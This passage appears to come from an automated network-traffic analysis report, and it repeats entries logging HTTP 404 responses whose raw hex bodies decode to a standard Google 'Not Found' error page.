40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:51:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 